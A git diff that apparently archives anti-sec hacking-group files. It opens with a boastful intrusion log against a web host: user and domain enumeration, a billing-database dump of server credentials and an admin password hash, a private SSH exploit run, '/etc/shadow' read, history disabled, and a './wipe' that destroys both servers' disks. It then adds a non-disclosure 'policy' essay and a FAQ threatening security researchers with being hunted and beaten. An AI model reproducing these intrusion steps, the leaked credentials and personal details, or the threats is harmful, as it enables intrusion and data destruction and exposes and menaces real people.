+screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
+[snip]
+wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
+htop
+[snip]
+wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
+wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
+[snip]
+wget http://www.logview.org/logview-install
+chmod +x logview-install
+./logview-install
+rm -rf logview-install
+
+sh-3.2# grep sec /etc/userdomains
+affiliatesecrets.wecloak.info: wecloaki
+infosecawareness.info: andlyssa
+secproxy.info: secproxy
+infosecawareness.andly.ssanz.net: andlyssa
+greycloud.nakedinsects.com: greyclou
+serversecuritynz.com: forumz
+orac.nakedinsects.com: oracnz
+infernal.nakedinsects.com: infernal
+nakedinsects.com: ni
+fluffy.nakedinsects.com: fluffy
+quickclix.orac.nakedinsects.com: oracnz
+seco39.ssanz.net: secossan
+
+sh-3.2# lastlog | grep -v Never
+Username         Port     From             Latest
+root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
+simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
+mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
+etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009
+
+sh-3.2# cd ~billing
+sh-3.2# ls -la
+total 301252
+drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
+drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
+lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
+-rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
+-rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
+-rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
+-rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
+-rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
+-rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
+-rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
+-rw-------   1 billing billing       17 May 27  2008 .contactemail
+drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
+-rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
+drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
+drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
+drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
+-rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
+drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
+drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
+-rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
+-rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
+drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
+drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
+drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
+drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
+drwx------   4 billing billing     4096 Jun  7 21:53 ssl
+drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
+drwx------   2 billing billing     4096 May 27  2008 .trash
+lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
+-rw-r--r--   1 billing billing      658 May 27  2008 .zshrc
+
+sh-3.2# cd www/
+
+sh-3.2# ls
+admin                 banned.php             configuressl.php  domainchecker.php  init.php             logout.php            postinfo.html       templates        
+viewticket.php  whois.php
+affiliates.php        billing                contact.php       downloads          installmingchowping  modules               _private            templates_c      _vti_bin
+aff.php               cart.php               creditcard.php    downloads.php      knowledgebase.php    networkissues.php     register.php        tutorials.php    _vti_cnf
+announcements.php     cgi-bin                dbconnect.php     htaccess.txt       lang                 networkissuesrss.php  serverstatus.php    upgrade          
+_vti_inf.html
+announcementsrss.php  clientarea.php         display.php       images             libs                 order.php             status              upgrade.php      _vti_log
+announcements.xml     configuration.php      dl.php            includes           link.php             passwordreminder.php  submitticket.php    viewemail.php    _vti_pvt
+attachments           configuration.php.new  dologin.php       index.php          login.php            pipe                  supporttickets.php  viewinvoice.php  _vti_txt
+
+sh-3.2# cat configuration.php
+
+
+sh-3.2# mysql
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 11021136
+Server version: 5.0.81-community MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+mysql> use billing_billing;
+
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+
+Database changed
+
+mysql> show tables;
++----------------------------+
+| Tables_in_billing_billing  |
++----------------------------+
+| mod_ipmanager              |
+| mod_ipmonitor              |
+| tblaccounts                |
+| tblactivitylog             |
+| tbladdons                  |
+| tbladminlog                |
+| tbladminperms              |
+| tbladminroles              |
+| tbladmins                  |
+| tbladminsecurityquestions  |
+| tblaffiliates              |
+| tblaffiliatesaccounts      |
+| tblaffiliateshistory       |
+| tblaffiliatespending       |
+| tblaffiliateswithdrawals   |
+| tblannouncements           |
+| tblbannedemails            |
+| tblbannedips               |
+| tblbillableitems           |
+| tblbrowserlinks            |
+| tblcalendar                |
+| tblcancelrequests          |
+| tblclientgroups            |
+| tblclients                 |
+| tblconfiguration           |
+| tblcontacts                |
+| tblcredit                  |
+| tblcurrencies              |
+| tblcustomfields            |
+| tblcustomfieldsvalues      |
+| tbldomainpricing           |
+| tbldomains                 |
+| tbldomainsadditionalfields |
+| tbldownloadcats            |
+| tbldownloads               |
+| tblemails                  |
+| tblemailtemplates          |
+| tblfraud                   |
+| tblgatewaylog              |
+| tblhosting                 |
+| tblhostingaddons           |
+| tblhostingconfigoptions    |
+| tblinvoiceitems            |
+| tblinvoices                |
+| tblknowledgebase           |
+| tblknowledgebasecats       |
+| tblknowledgebaselinks      |
+| tbllinks                   |
+| tblnetworkissues           |
+| tblnotes                   |
+| tblorders                  |
+| tblpaymentgateways         |
+| tblpricing                 |
+| tblproductconfiggroups     |
+| tblproductconfiglinks      |
+| tblproductconfigoptions    |
+| tblproductconfigoptionssub |
+| tblproductgroups           |
+| tblproducts                |
+| tblpromotions              |
+| tblquoteitems              |
+| tblquotes                  |
+| tblregistrars              |
+| tblservers                 |
+| tblsslorders               |
+| tbltax                     |
+| tblticketbreaklines        |
+| tblticketdepartments       |
+| tblticketescalations       |
+| tblticketlog               |
+| tblticketmaillog           |
+| tblticketnotes             |
+| tblticketpredefinedcats    |
+| tblticketpredefinedreplies |
+| tblticketreplies           |
+| tbltickets                 |
+| tblticketspamfilters       |
+| tbltodolist                |
+| tblupgrades                |
+| tblwhoislog                |
++----------------------------+
+80 rows in set (0.00 sec)
+
+mysql> select name,ipaddress,hostname,username,password from tblservers;
++--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
+| name         | ipaddress      | hostname         | username | password                                                                 |
++--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
+| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
+| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
+| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
++--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
+3 rows in set (0.00 sec)
+
+mysql> select firstname,lastname,email,username,password from tbladmins;
++-----------+----------+-----------------+----------+----------------------------------+
+| firstname | lastname | email           | username | password                         |
++-----------+----------+-----------------+----------+----------------------------------+
+| Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
++-----------+----------+-----------------+----------+----------------------------------+
+1 row in set (0.06 sec)
+
+mysql> quit
+Bye
+
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda5             2.0G  477M  1.4G  26% /
+/dev/sda8             875G  147G  684G  18% /home
+/dev/sda3             9.7G  6.8G  2.5G  74% /usr
+/dev/sda2             9.7G  7.0G  2.3G  76% /var
+/dev/sda1              99M   23M   72M  24% /boot
+/dev/sda6             996M   64M  881M   7% /tmp
+tmpfs                 3.9G     0  3.9G   0% /dev/shm
+/dev/sdb1             459G  163G  273G  38% /backup
+
+sh-3.2# ./wipe
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda5              64Z   64Z  1.5G 100% /
+/dev/sda8              64Z   64Z  729G 100% /home
+/dev/sda3              64Z   64Z  3.0G 100% /usr
+/dev/sda2              64Z   64Z  3.0G 100% /var
+/dev/sda1              16Z   16Z     0 100% /boot
+/dev/sda6              64Z   64Z  933M 100% /tmp
+tmpfs                 3.9G     0  3.9G   0% /dev/shm
+/dev/sdb1              64Z   64Z  296G 100% /backup
+
+sh-3.2# exit
+exit
+
+
+-----------------------------------
+
+osiris			[ DOWN ]
+devil			[  UP  ]
+
+-----------------------------------
+
+anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
+
+		[+] 0wn0wn - anti-sec group
+		[+] Target: 66.197.204.101
+		[+] SSH Port: 22
+		
+		[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+
+sh-3.2# export HISTFILE=/dev/null
+
+sh-3.2# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+
+sh-3.2# uname -a
+Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
+
+sh-3.2# head -n1 /etc/shadow
+root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
+
+sh-3.2# w
+ 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop
+
+sh-3.2# pwd
+/root
+
+sh-3.2# ls -la
+total 1232
+drwxr-x--- 23 root root   4096 Jul  4 04:06 .
+drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
+-rw-------  1 root root    957 Jun 13 05:20 .accesshash
+-rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
+-rw-------  1 root root   7258 Jun 30 10:03 .bash_history
+-rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
+drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
+-rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
+drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
+-rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
+drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
+drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
+drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
+drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
+-rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
+drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
+-rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
+-rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
+drwx------  2 root root   4096 Jun 12 01:51 .elinks
+-rw-r--r--  1 root root     16 Jun 13 15:33 .forward
+drwx------  3 root root   4096 Jun 11 23:59 .gconf
+drwx------  2 root root   4096 Jun 11 23:59 .gconfd
+drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
+drwx------  2 root root   4096 Jun 12 01:53 .gnupg
+drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
+-rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
+-rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
+-rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
+drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
+-rw-------  1 root root     37 Jun 12 02:11 .my.cnf
+drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
+-rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
+-rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
+drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
+drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
+-rw-------  1 root root   1024 Jun 12 02:50 .rnd
+drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
+drwx------  2 root root   4096 Jun 22 09:11 .ssh
+-rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
+drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
+drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi
+
+sh-3.2# cat .bash_history
+sh hninst.sh
+passwd
+fdisk -l
+exit
+w
+history
+screen -ls
+screen -r 2785.pts-0.devil
+exit
+wget http://merovingian.net.nz/htop-0.8.1.tar.gz
+[snip]
+csf -a 125.238.144.110
+exit
+cd /home
+ls
+wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
+[snip]
+wget http://visit4cash.net/mainfiles.tar.gz
+mv mainfiles.tar.gz /home/visit4ca/public_html
+cd /home
+cd visit4ca
+cd public_html
+ls
+tar zxvf mainfiles.tar.gz
+[snip]
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.38.206.233
+csf --restart
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 118.94.59.33
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+[snip]
+screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
+screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
+screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
+
+sh-3.2# cat /etc/userdomains
+advertising.ssanz.net: adserver
+forums.visit4cash.net: forumsv4
+megacashzone.com: megacash
+visit4cash.net: visit4ca
+seanone.com: seanonec
+backup2.ssanz.net: backup2
+*: nobody
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda3              31G  7.5G   22G  26% /
+/dev/sdb1             452G   35G  394G   9% /home
+/dev/sda1              99M   23M   72M  24% /boot
+tmpfs                 495M  4.0K  495M   1% /dev/shm
+/usr/tmpDSK           485M   14M  446M   3% /tmp
+
+sh-3.2# who
+root     pts/0        2009-07-03 20:18 (125.238.144.224)
+
+sh-3.2# ./wipe
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda3              64Z   64Z   24G 100% /
+/dev/sdb1              64Z   64Z  417G 100% /home
+/dev/sda1              16Z   16Z   77M 100% /boot
+tmpfs                 495M  4.0K  495M   1% /dev/shm
+/usr/tmpDSK           485M   14M  446M   3% /tmp
+
+sh-3.2# exit
+exit
+
+
+-----------------------------------
+
+osiris			[ DOWN ]
+devil			[ DOWN ]
+
+-----------------------------------
+
+Once again, practice what you preach. Don't claim to be something you're not.
+Most importantly, don't go after us. We're not the problem. What you say does
+not align AT ALL with what you actually do with your servers.
+
+Fix that first, you dig?
+
+~ There will always be no way out.
+
diff --git a/anti-sec/txt/ats-policy.txt b/anti-sec/txt/ats-policy.txt
new file mode 100644
index 0000000..438d26a
--- /dev/null
+++ b/anti-sec/txt/ats-policy.txt
@@ -0,0 +1,223 @@
+~~~
+~		       Anti security "policy" v0.9 by anonymous
+~		       - Save the bugs! 
+~
+~~~
+
+-- This is my view and it does not fully speak for all the people
+-- that are involved in anti security and it is subject to heavy change.
+
+Content:
+
+Introduction.
+What is this policy?
+Purpose of the policy.
+Is this a joke ?
+The policy.
+Using the policy.
+Contribute to the policy.
+Thanks & reference.
+
+
+[ Introduction ]
+
+Hello. 
+
+This policy is designed to try to advocate a new a completly different
+policy for the underground community that is designed for "anti disclosure"
+basicly the opposite of full disclosure but with a few side notes that advocate
+some disclosure of bug information but in general this is designed to be a 
+policy that people will read and think, "Hey.. this is the right thing!",
+hopefully.
+
+
+[ What is this policy ]
+
+This policy is basicly a guideline.
+
+It will demonstrate that it is not good to post bug/exploit information to
+places like BUGTRAQ, packetstorm, other public forums. It will show that
+most of the people that are excessively posting bugs to these public forums 
+are  actually not doing it for security but quite the contrary for things
+like fame, jobs, etc.
+
+The policy will show you that if you are really interested in security
+that there is a much better way of increasing security, because basicly
+when you send a new bug and an exploit to a place like BUGTRAQ you are
+actually decreasing security and potentially causing hundreds of thousands
+of people high damage from when script kiddies use your bug/exploit to
+break into their system.
+
+
+It will demonstrate the best way to maintain the anti security policy 
+which is to keep bugs/exploits private within either a very small group
+of trusted people that have the skill to understand what it is about or just
+simply keep it for yourself. If however the exploit leaks you should contact 
+vendor and tell him about the bug. If the bug is discovered by someone else
+or the vendor has fixed the problem you are free to post the exploit to a
+non public forum, maybe your website.
+
+Also it is essential to demonstrate that a person that is looking for security 
+bugs does so just for the sheer enjoyment and thrill, difficulty of finding 
+and obvious bug or a very difficult to find bug and then possible exploiting
+it, after this has taken place he should carry  on and start looking for other
+bugs, ie: by auditing src code, doing protocol 'checks', reverse engineering
+and using security logic. This is an important thing in this policy that needs
+to be addressed. We do this because we love it!
+
+ 
+[ Purpose of the policy ]
+
+
+The purpose of this policy is to raise public awareness of a new way 
+of thinking in the security scene, it is written to try to help out 
+the anti security movement and to show interested people the best
+way to be a part of the anti security movement, by using this policy.
+
+One of the main reasons for this policy and what it is meant to address is the
+need for none-disclosure, which is basicly because way too much stuff  is
+getting sent to BUGTRAQ and people like us really dont like it that way
+and we hope that you wont like it either after studying anti security. 
+
+The purpose of this policy is to give people that are hackers a policy
+that they can use to keep things private as they should remain and not
+tempted by the dark side.
+
+[ Is this a joke? ]
+
+For some reason a lot of people think this is a joke, I've been asked about 4 
+times wether this whole anti security thing is a joke. And to answer your
+question about this policy, No! It is not a joke we take this seriously but
+we welcome any flames, comments or whatever that anyone might have.
+
+
+
+[ The policy ]
+
+
+
+The policy in a nutshell.
+
+1. Do not tell the world about security bugs you find.
+2. Do not release exploits to public forums.
+3. If you are serious about security, notify only vendor.
+4. If exploit leaks, notify vendor.
+5. If bug becomes public, you are safe to release exploit to 
+   a none public forum.
+6. Never ever give bug or exploit information out on a bug/exploit
+   trusted to you by the discoverer/author of the bug/exploit. This
+   is basis for trust, do not give what you did not write!
+
+This will demonstrate basicly the steps and scenarios that might 
+happen and how the policy is used in those steps, thus describing the
+policy.
+
+note: fiction ;>
+
+Okay let's create a few variables.
+
+HACKER = The person that wants to use the anti security policy
+VENDOR = Company or group that wrote the program that HACKER found bug in
+COMMUNITY = BUGTRAQ, PACKETSTORM, and the like.
+
+Background:
+
+HACKER is an avid auditer and finds a bug in bind-8.2.2-P7 a 1 byte overflow
+which is pretty difficult to exploit but he manages, he writes an exploit
+for this bug and he gives it to a very small amount of people, possible
+people that are maybe in his group or that he trusts explicitly.
+
+< scenario 1 >
+
+HACKER who is a follower of the anti security policy does not notify the
+community or the vendor and the bug lives on for many years, hopefully ;>
+Causing little or no damage at all.
+
+< scenario 2 >
+
+HACKER is a TRUE security minded person, ie: someone that really cares
+about security and is not the typical "hey I say I care about security
+but what I really want is fame and a job". Allright this person who 
+also has hopefully read something about the anti security movement and
+since he really apreciates security he should ONLY contact the vendor and 
+let them handle it.
+
+< scenario 3 >
+
+HACKER is a glory/fame seeker and he decides to post the bug to the
+COMMUNITY. Ofcorse he says it is in the interest of full disclosure 
+and not fame and the like. He has read some full disclosure 
+policy and notifies vendor maybe 5 days before he releases the bug and
+most likely the exploit too. 
+
+After the five days have passed, we must conclude that the vendor has issued
+some sort of hotfix or a patch to fix the security problem and now the HACKER
+sends the bug information, the exploit to the COMMUNITY and possible a
+patch too. 
+
+Now has security been increased? Do you really think that most of COMMUNITY. 
+ie: the people that read BUGTRAQ want to patch their servers? No! It is 
+script kiddies that are waiting for the latest warez, as soon as HACKER
+releases this new bug to the COMMUNITY thousands of script kiddies with
+little or no skill will start breaking into hundreds of thousands
+of boxes and if this bug were genuine, they would! And belive me lots of 
+boxes would get destroyed.
+
+Now, I ask.. is this a good thing you are doing by posting to the COMMUNITY
+all logic says NO!
+
+< scenario 4 >
+
+HACKER in this scenarion followed the anti security movement.
+
+HACKER has had the  exploit for a year or more and now for some strange
+reason you hear rumors that script kiddies have the exploit. If these rumors
+turn out to be correct you have an obligation to notify the vendor, so that
+they can issue a patch, because this can cause just as much havoc as when 
+people post to the COMMUNITY
+
+Q: Well what is the damn difference then?!? It is bound to leak someday. 
+A: Yes it happens much to often but there is alot of stuff out there
+   that has not leaked and the best way to not make things leak is too 
+   not give to anyone at all. This however is not possible for some so   
+   the best thing is to limit it to ONLY people that you trust 100 %.
+   And we hope that people that follow the anti security trend will
+   also realize a crucial point which is not to give what u didn't write!
+
+
+
+
+Someone else has found the bug that HACKER found and has notified the
+COMMUNITY and VENDOR. After this has happened HACKER is free to publish
+his code on a non-public forum, like his personal website. This however is not
+required at all.
+
+
+[ Using the policy ]
+
+Follow the guidelines that were outlined in previous sections, and remember
+what keynotes.
+
+[ Contribute to the policy ]
+
+This policy is considered pre-beta and is subject to heavy change. We need
+alot of help in adjusting this policy and so if you have any ideas about
+things that are not clear and how to clear them up then please send us
+that information. Also if you have things you would like to add/tweak
+just send it.
+
+
+[ Thanks and reference ]
+
+This policy is written by anonymous and it will remain that way because
+it is not supposed to portrait the views on a single person but of all
+the people that follow this movement.
+
+However certain groups and people deserve credit:
+
+silent for starting anti security and doing most of the work.
+jimjones for writing the great intro and FAQ!
+RFP for writing a policy for the full disclosure people.
+Everyone that has contributed so far!
+
+
diff --git a/anti-sec/txt/faq1.txt b/anti-sec/txt/faq1.txt
new file mode 100644
index 0000000..1bb18aa
--- /dev/null
+++ b/anti-sec/txt/faq1.txt
@@ -0,0 +1,92 @@
+THIS MOVEMENT IS APART OF THE ANTI-SEC / ANTI-WHITEHAT MOVEMENT.
+
+THIS IS NOT A JOKE READ THE ENTIRE FUCKING FAQ.
+
+THIS IS THE SIMPLE #PHRACK FAQ:
+
+keep this in mind: when speaking of phrack "magazine" we mean that whitehat
+magazine on phrack.org. also we use examples, but this applies to all people
+and websites that fall into these categories.
+
+1) what is a whitehat?
+a) A WHITEHAT IS ANYONE WHO HELPS THE SECURITY INDUSTRY (POSTING BUGS/INFO ETC)
+
+2) are there greyhats?
+a) NO, ONCE A PERSON HAS THE EVIL WHITEHAT WAYS INSIDE OF THEM, THEY BECOME A PURE WHITEHAT, PLAIN AND SIMPLE.
+
+3) how come "blackhats" are helping the security industry (bugtraq/phrack)?
+a) THE SECURITY INDUSTRY INFECTS HACKERS WITH THESE EVIL THOUGHTS. THE
+   SECURITY INDUSTRY BRAINWASHES HACKERS TO WORK FOR THEM (BY PUBLISHING THIS
+   BUG/INFO/CODE INFORMATION). ALSO THESE PEOPLE ARE NOT BLACKHATS, THEY ARE
+   WHITEHATS BASED ON QUESTION #2. THE PROBLEM IS THAT THEY DO NOT REALIZE IT.
+   ALSO MOST OF THESE SO CALLED "BLACKHATS" DONT HACK. REAL HACKERS DO NOT 
+   ACTUALLY PUBLICIZE SUCH INFORMATION (TO PHRACK BUGTRAQ ETC).
+
+4) how is phrack a whitehat magazine?
+a) EVERY TECHNIQUE THAT IS RELEASED IN PHRACK IS NOW REALIZED BY THE SECURITY
+   INDUSTRY. THE SEC INDUSTRY NOW SPENDS TIME TO THWART THESE TECHNIQUES.
+
+   ALSO, ALOT OF THE ARTICLES IN PHRACK DO NOT BENEFIT THE "HACKER SCENE"
+   AT ALL. HOW IS IT POSSIBLE THAT "POSITIVE" IDS ARTICLES OR HONEYPOT
+   KEYLOGGERS MAKE THERE WAY INTO A "for hackers by hackers" MAGAZINE?
+
+5) what are people like spaf/chris rouland/lance then?
+a) THEY ARE THE ENEMY. WHITEHATS = ENEMY.
+
+6) im confused, i thought k2 is a blackhat but he helps with honeypot?
+a) HES NOT A BLACKHAT, HES A BAD ROLE MODEL FOR ALL HACKERS. HE IS 
+   BRAINWASHED BY THE SECURITY SCENE. IF HE CHANGES - GOOD FOR HIM. IF HE
+   CONTINUES HIS WAYS - HE WILL CONTINUE TO BE THE ENEMY.
+
+7) i get what you're saying now, so like k2/duke/horizon/scut (for example)
+   aren't really hackers, they are just brainwashed by the security industry
+   to work for them?
+a) THIS IS ABSOLUTELY FUCKING CORRECT.
+
+8) so what am i supposed to do?
+a) STOP MAKING ANY OF YOUR INFORMATION PUBLIC. BY INFORMATION WE MEAN
+   CODE,BUGS,TECHNIQUES ETC. KEEP THIS INFORMATION PRIVATE. DON'T TRADE
+   IT ON IRC. DON'T ENTRUST THIS INFORMATION INTO INDIVIDUALS YOU DONT
+   TRUST 100% (SOME PEOPLE TURN AROUND AND LEAK ALL YOUR SHIT OR THEY
+   END UP SELLING IT TO ISS). AND FOR FUCKS SAKE, TRY ACTUALLY USING
+   WHAT YOU CODE/FIND.
+
+9) why do people like that whitehouse guy say "hackers shouldnt help criminals"
+   or "hackers should help security industry by responsibly disclosing bug
+   information to companies"?
+a) THIS IS APART OF THE MASSIVE CAMPEIGN TO GET HACKERS TO WORK FOR THEM.
+   THE FACT IS THAT IF THE "HACKING SCENE" DOESNT HELP THE SECURITY INDUSTRY,
+   THEY WILL BECOME LOST BECAUSE THEY ARE A BUNCH OF COMPLETE IDIOTS. THE
+   BEST BUGS/INFORMATION IS USUALLY GIVEN TO THE SECURITY INDUSTRY BY PEOPLE
+   IN THE "HACK SCENE", AND THIS IS A FACT. IT MUST STOP.
+
+10) how can i help?
+a) HELP SPREAD THIS WAY OF THINKING TO EVERYONE YOU KNOW, ONCE PEOPLE REALIZE
+   THEY ARE BEING BRAINWASHED AND PROFITTED OFF OF, THEY WILL CHANGE. IF YOU 
+   WANT TO MAKE A SIGNIFICANT CHANGE, START MAYBE THINKING ABOUT PROJECT MAYHEM.
+
+11) ok, but like what if i dont want to change now? "lol"
+a) YOU WILL BE HUNTED DOWN LIKE K2, DERAADT, DUGSONG, ETC. THE INTERNET
+   IS NO LONGER SAFE FOR WHITEHATS. NO LONGER SAFE FOR THE SECURITY INDUSTRY.
+
+12) what should whitehats think of this movement?
+a) WHITEHATS/SECURITY INDUSTRY PEOPLE SHOULD BE AFRAID OF THIS MOVEMENT.
+   IT SEEMS THAT HIGH MEMBERS OF THE SECURITY INDUSTRY HAVE ALREADY FALLEN
+   VICTIM TO THIS MOVEMENT. THEY SHOULD STOP PUBLICLY MAKING AVAILABLE
+   INFO SUCH AS "BUGS" OR "CODE" OR "TECHNIQUES". IF THEY DO NOT CHANGE
+   THEY WILL CONTINUE TO BE TARGETED, AND IT SUCKS TO GET OWNED/FIRED/
+   PHYSICALLY BEATEN.
+
+13) why does #phrack like DMCA?
+   DMCA MAKES IT SO THAT PEOPLE CAN'T POST THESE BUGS/CODE ETC. READ UP
+   ON IT. IT WILL BE A GREAT WEAPON FOR THIS MOVEMENT ONCE IT STARTS
+   BEING ENFORCED ON A REGULAR BASIS.
+
+14) ya ok, i think im going to change, this isn't some joke right?
+a) NO IT ISN'T A JOKE. SECURITY INDUSTRY CANT SURVIVE AT ALL WITHOUT
+   THE SELLOUTS & BRAINWASHED SECTION OF THE HACKER SCENE. CHANGE YOUR
+   FUCKING WAYS. DONT POST. DONT HELP THE SECURITY INDUSTRY.
+
+   STOP... BEING.... BRAINWASHED......................
+
+THE END: written in 25 minutes by the PHC, so dont bug us.
diff --git a/anti-sec/txt/faq2.txt b/anti-sec/txt/faq2.txt
new file mode 100644
index 0000000..18960a0
--- /dev/null
+++ b/anti-sec/txt/faq2.txt
